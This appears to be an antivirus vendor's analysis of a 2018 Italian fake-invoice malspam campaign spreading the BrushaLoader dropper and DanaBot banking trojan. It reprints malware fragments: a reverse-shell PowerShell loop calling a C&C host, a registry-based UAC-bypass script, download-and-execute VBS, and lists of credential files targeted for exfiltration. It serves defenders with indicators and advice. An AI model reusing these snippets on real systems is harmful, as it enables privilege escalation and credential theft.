Malspam Campaign with FAKE INVOICE that spreads BrushaLoader Dropper

A brand new MalSpam wave dated 18th September 2018 against ITALIAN users

This is the analysis made by TG Soft's C.R.A.M. (Anti-Malware Research Center) regarding an e-mail campaign that spreads the Malware Trojan Dropper "BrushaLoader" dated 18th September 2018.

In order to send massive e-mails pools, cyber-criminals often use "social engineering" methods developed to deceive victims and force them to open either links or infected attachments placed on the message's body.
If you have recieved a suspicious e-mail, please send it to C.R.A.M. (Anti-Malware Research Center): How to send suspicious e-mails



Fake e-mail "fattura 189178844" spreads the Trojan Dropper  "BrushaLoader"

Name: Downloader BrushaLoader
Malware Family
: Dropper
VirIT: Trojan.VBS.Dropper.BN

The first e-mail has been detected on the 18th September 2018.
At the moment, two different kinds of e-mail's subject have been found: [fattura *random number*] or [fattura *random number*].
The ".rar" file attached to it, remains the same indipendently from e-mail's subject.

E-mail sample analysis:

Subject:  fattura 189178844

fattura 189178844 - Mozilla Thunderbird
Oggetto: fattura 189178844

Ti sto mandando la fattura in allegato
Grazie per aver utilizzato i nostri servizi e ti invitiamo di nuovo.




1 allegato: Fattura1891861.rar

Back on Top

How does it spreads:
E-mail informs the user of an invoice for some services (without specifying which or when).

Attached to the e-mail, we can find a  ".rar" file :
  • File Name: Fattura1891861.rar  
  • Dimension: 1015 byte
  • Md5: 395AE966BC124A9AAC90037A6A9E6621                                                  

The ".rar" file contains the "VBS" dropper as script file : 

  • File Name: Fattura1891861.vbs  
  • Dimension: 2.280 byte
  • Md5: 907306BC998F4B98BB05EB2EC40E89ED

When the VBS file is executed, some connection attempts will be done to the following URLs : 

  • https://www[.]dencedence[.]denceasdq/12/3232
  • http://proservesmail[.]science/api[.]php?faxid=757010617&opt=21665550759&sfree
  • http://192[.]3[.]204[.]229/api[.]php?faxid=757010617&opt=21665550761&sfree
When the connection is successfully made to this URL : http://192[.]3[.]204[.]229/api[.]php?faxid=757010617&opt=21665550761&sfree
then the api[1].php file is downloaded, in which contains the following powershell script:

set Fh741816 = CreateObject("shell.application")
Fh741816.ShellExecute "powershell", "-EncodedCommand " + Chr(34) +
ByAHQAJwApADsA" + Chr(34) + "", "", "open", 0
set Fh741816 = nothing

Which is executed by the following command:

-EncodedCommand "SQBFAFgAIAAo [..] JwApADsA"

The file at this URL: https://laredoute[.]space:443/chkesosod/downs/qwert is then downloaded, and it contains the following powershell script:

powershell.exe -encodedCommand

At the end of the downloading process it finally will be executed.

Decoding the previous command we can read the following code:

while (1 - eq 1) {
    try {
        $ErrorActionPreference = 'Continue';
        $mcUdDu132 = New - Object Net.Sockets.TCPClient("laredoute[.]space", 80);
        $jtJ60784 = ($mcUdDu132.GetStream());
        [byte[]] $cw241 = 0. .255 | % {
        while (($i = $jtJ60784.Read($cw241, 0, $cw241.Length)) - ne 0) {
    } catch {
        Start - Sleep - s 10;
        if ($mcUdDu132.Connected) {

This script uploads information to its C&C server (laredoute[.]space) by responding to specific requests, we can see some examples below:

Command Received: "6f7074696f6e73winos"; $winos = [environment]::OSVersion.Version; $winos.Major;$winos.Minor;$winos.Build;$winos.Revision;
Client response:  6f7074696f6e73winos 6 1 7601 65536

Command Received: "6f7074696f6e73username";[Environment]::UserName;
Client response: 6f7074696f6e73username [utente del PC REDACTED]

This allows the malware to communicate several informations regarding the PC/ SERVER. The "IPCONFIG.EXE" command is also used to retrive the IP of the machine.

Then it tries to connect to 192[.]3[.]204[.]229/api[.]php?faxid=757010617&opt=21665550799&sfree and downloading a new VBScript, in which contains an encoded executable of the "DanaBot" family, after the decoding process it will be saved in the user's temporary folder (%temp%) with a random name; in this analysis it firstly was named "TnGzH" and then renamed to "TnGzH.exe" through an additional script, and the end of this process, executed.

  • File Name: TnGzH.exe
  • VirIT: Trojan.Win32.DanaBot.AUY
  • Dimension: 346.112 byte
  • Md5: 4252CC51968F7BB250D5A1D7E5AB128E

When the file is executed, it extracts another one in the temp folder called "TnGzH.dll", the latter is executed by the following command: C:\Windows\system32\rundll32.exe C:\Users\<UTENTE>\AppData\Local\Temp\TnGzH.dll,f1 C:\Users\<UTENTE>\AppData\Local\Temp\TnGzH.exe
  • File Name: TnGzH.dll
  • VirIT: Trojan.Win32.DanaBot.AUY
  • Dimension: 143.360 byte
  • Md5: 4F412CEE07D26A6D311775B3941AE53A
Then, it tries to connect to the following IPs:
  • 198[.]7[.]141[.]21
  • 249[.]55[.]145[.]209
  • 161[.]40[.]127[.]191
  • 254[.]175[.]147[.]60
  • 45[.]77[.]231[.]138
In particular, from the address 45[.]77[.]231[.]138 it downloads another random named DLL, in our case:

  • File Name: 10055932.dll
  • VirIT: Trojan.Win32.DanaBot.AUY
  • Dimension: 1.636.880 byte
  • Md5: F826534A5C23C75B1BD19F1EA7E60726
The VBS file  "Fattura1891861.vbs" continues to connect to the following page  192[.]3[.]204[.]229/api[.]php?faxid=757010617&opt=21665550854&sfree and afterwards it downloads a new script showed below :

Set WSobj = CreateObject("WScript.Shell")
Set objFsos = CreateObject("Scripting.FileSystemObject") 
Set tempfolder = objFsos.GetSpecialFolder(2)
WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", ""
WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", tempfolder + "\TnGzH.exe", "REG_SZ"
WSobj.Run ("%windir%\System32\eventvwr.exe")
WScript.Sleep 2000
WSobj.Run ("%windir%\system32\compmgmt.msc /s")
Set WSobj = Nothing
Set objFsos = Nothing

In this way, the behavior of "compmgmt.msc" involves the execution of the  "%temp%\TnGzH.exe" malware, then a new script is downloaded and it deletes the previously created keys: 

Set WSobj = CreateObject("WScript.Shell")
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\"
Set WSobj = Nothing

The VBS continues to connect to "192[.]3[.]204[.]229/api[.]php?faxid=757010617&opt=21665550858&sfree", downloading an additional script:

Dim objShell, objFso, tempfolder
Set objShell = CreateObject("Shell.Application")
Set objFso= CreateObject("Scripting.FileSystemObject") 
Set tempfolder = objFso.GetSpecialFolder(2)
objShell.ShellExecute "powershell", "powershell -EncodedCommand JABwAGEAdABoACAA
QB0AGgAKQA7AA==", "", "runas", 0
Set objShell = Nothing
Set objFso = Nothing
Set tempfolder = Nothing

The script runs through PowerShell, it connects again to the IP  "192[.]3[.]204[.]229" by calling the "fax[.]php?id=admin" page, it downloads the "TnGzH.exe" file to the user's "temp" folder and it runs by "RUNDLL32.EXE" as seen above.

The three methods showed above are used to infect the PC/SERVER and to communicate with C&C. These methods are represented in the following graph.

Process graph:

The persistence of this malware is based on a service that loads the DanaBot dll, and the respective path is "C:\ProgramData\100559DC\10055932[.]dll"

Service Name:
Description: Monitors system events and notifies subscribers to COM+ Event System of these events.
Path: C:\Windows\system32\svchost.exe -k LocalService (C:\ProgramData\100559DC\10055932.DLL)

DanaBot dll connects to the following C&C servers's IPs:
  • 13[.]38[.]191[.]32
  • 250[.]217[.]157[.]172
  • 237[.]59[.]8[.]12
  • 176[.]35[.]198[.]67
  • 117[.]61[.]222[.]26
  • 240[.]252[.]18[.]141
  • 2[.]52[.]194[.]160
  • 203[.]123[.]241[.]151
  • 95[.]179[.]151[.]252
  • 45[.]77[.]231[.]138
Only the last 2 IP addresses (95[.]179[.]151[.]252 and 45[.]77[.]231[.]138) are now online.
The C&C servers send commands for the data exfiltration that it is given by the execution of the DLL, through "RUNDLL32.EXE", passing it as parameter the function's number/name:
  • C:\Windows\system32\RUNDLL32.EXE C:\PROGRA~2\100559DC\10055932.DLL,f5 E0FBBC92DB9927BFC474A64DF4F9C22F
  • C:\Windows\system32\RUNDLL32.EXE C:\PROGRA~2\100559DC\10055932.DLL,f4 CCE32C822138600E282D482BFC595B3D
In the examples above the functions "f5" and "f4" are executed with their relative parameters.

Furthermore, the function "f7" of the DanaBot has been called for the generation of a "RSA" key: C:\ProgramData\Microsoft\Crypto\RSA\\MachineKeys \c8a2ffdb7c0004909a9da2bb05dfd4b6_c69802bc-d96a-48da-abe6-0e5e19ac8613

The malware's purpose is to exfiltrate several login credentials, configuration files of FTP/VPN software informations, cookies, cache.
We are reporting some examples below:
  • C:\Users\[UTENTE]\AppData\Roaming\Dialer Queen\*.ini
  • C:\Users\[UTENTE]\AppData\Roaming\CPN\Cake\*.store
  • C:\Users\[UTENTE]\AppData\Roaming\Flexiblesoft\Dialer Lite\*.set
  • C:\Users\[UTENTE]\AppData\Local\Miranda\\*.*
  • C:\Users\[UTENTE]\Documents\*.rdp
  • C:\Program Files\Cisco Systems\VPN Client\Profiles\*.pcf
  • C:\Users\[UTENTE]\AppData\Roaming\Mozilla\Firefox\\Profiles\*.*
  • C:\Users\[UTENTE]\AppData\Roaming\Opera\*.*
  • C:\Users\[UTENTE]\AppData\Local\Microsoft\Windows Live Mail\\*.*
  • C:\Users\[UTENTE]\AppData\Local\Microsoft\Windows Mail\\*.*
  • C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
  • C:\Program Files\Common Files\Ipswitch\WS_FTP\*.*
  • C:\ProgramData\Ipswitch\WS_FTP Home\Sites\*.*



laredoute[.]space  (C&C)

Back on Top


How to protect yourself

Experience and common sense are the first weapons not to be victims of this kind of fraud.
A careful reading of the e-mails is essential, in all its elements. Be wary of attachments in ZIP format and if possible, do not enable the automatic execution of macros, a setting that could make the hasty opening of Word and Excel files dangerous. Another little help can be to check where any link is pointing, even if this type of evaluation can be very difficult.

In the event that you were infected by a Banker, the advice from the C.R.A.M. (TG Soft) is to take appropriate security measures even after the remediation of the systems involved as the change of passwords most commonly used on the web navigation.
In the event that the workstation involved was used for home-banking operations, it is also advisable to check with your credit institution.

Back on Top

How to send suspicious e-mails for analysis as possible viruses / malware / ransomware and / or phishing attempts

Sending materials to be analyzed at the TG Soft Anti-Malware Research Center for analysis that is always free and can be done safely in two ways:
  1. Any e-mail that can be considered a suspect can be sent directly by the recipient's e-mail choosing as sending mode "Forward as Attachment" and inserting in the subject section "Possible phishing page to verify" rather than "Possible Malware to verify" to the following mail:  lite@virit.com
  2. save as an external file to the e-mail program used the e-mail to be sent to the C.R.A.M. TG Soft for analysis. The resulting file must be sent by uploading it from the page Send Suspicious Files (http://www.tgsoft.it/italy/file_sospetti.asp). Of course, to have a feed-back compared to the analysis of the infected files sent, you will need to indicate an e-mail address and a brief description of the reason for sending the file (for example: possiible / probable phishing; possible / probable malware or other) .
Back on Top

Integrate your PC / SERVER protection with Vir.IT eXplorer Lite

Vir.IT eXplorer PRO has been designed and implemented in such a way to increase the security of your computers, PCs and servers alike, Vir.IT eXplorer Lite -FREE Edition-.

Vir.IT eXplorer Lite has the following features:
  • freely usable both in the private sector and in the business environment with Engine + Signature updates without time limitations;
  • It works with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security already present on PC and SERVER, recommended to be used as an integration of the AntiVirus already in use as it does not conflict or slow down the system but significantly increases the security in terms of identification and remediation of infected files;
  • identifies and, in many cases, also removes most of the viruses / malware actually circulating or, alternatively, allows it to be sent to the C.R.A.M. Anti-Malware Research Center for further analisys;
  • thanks to the Intrusion Detection technology, made available also in the Lite version of Vir.IT eXplorer, the software is able to report any new generation viruses / malware that are placed in automatic execution and proceed to send the files reported to the C.R.A.M. of TG Soft.
  • Proceed to download Vir.IT eXplorer Lite from the official TG Soft site distribution page.
Back on Top

For Vir.IT eXplorer PRO users...

For Vir.IT eXplorer PRO owners it is always possible to contact or forward suspicious e-mails for free to the TG Soft technical support, the e-mail address for sending suspicious e-mails is: assistenza@viritpro.com (the suspicious e-mail goes sent as an attachment).  C.R.A.M. Technicians will analyze the material recived to evaluate every possible danger without any risk for our customers.
Go check our TG Soft support.

Anti Malware Research Center by TG Soft
Back on Top

Any information published on our site may be used and published on other websites, blogs, forums, facebook and/or in any other form both in paper and electronic form as long as the source is always and in any case cited explicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web page from which textual content, ideas and / or images have been extrapolated.
It will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of summary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”

Vir.IT eXplorer PRO is certified by the biggest international organisation: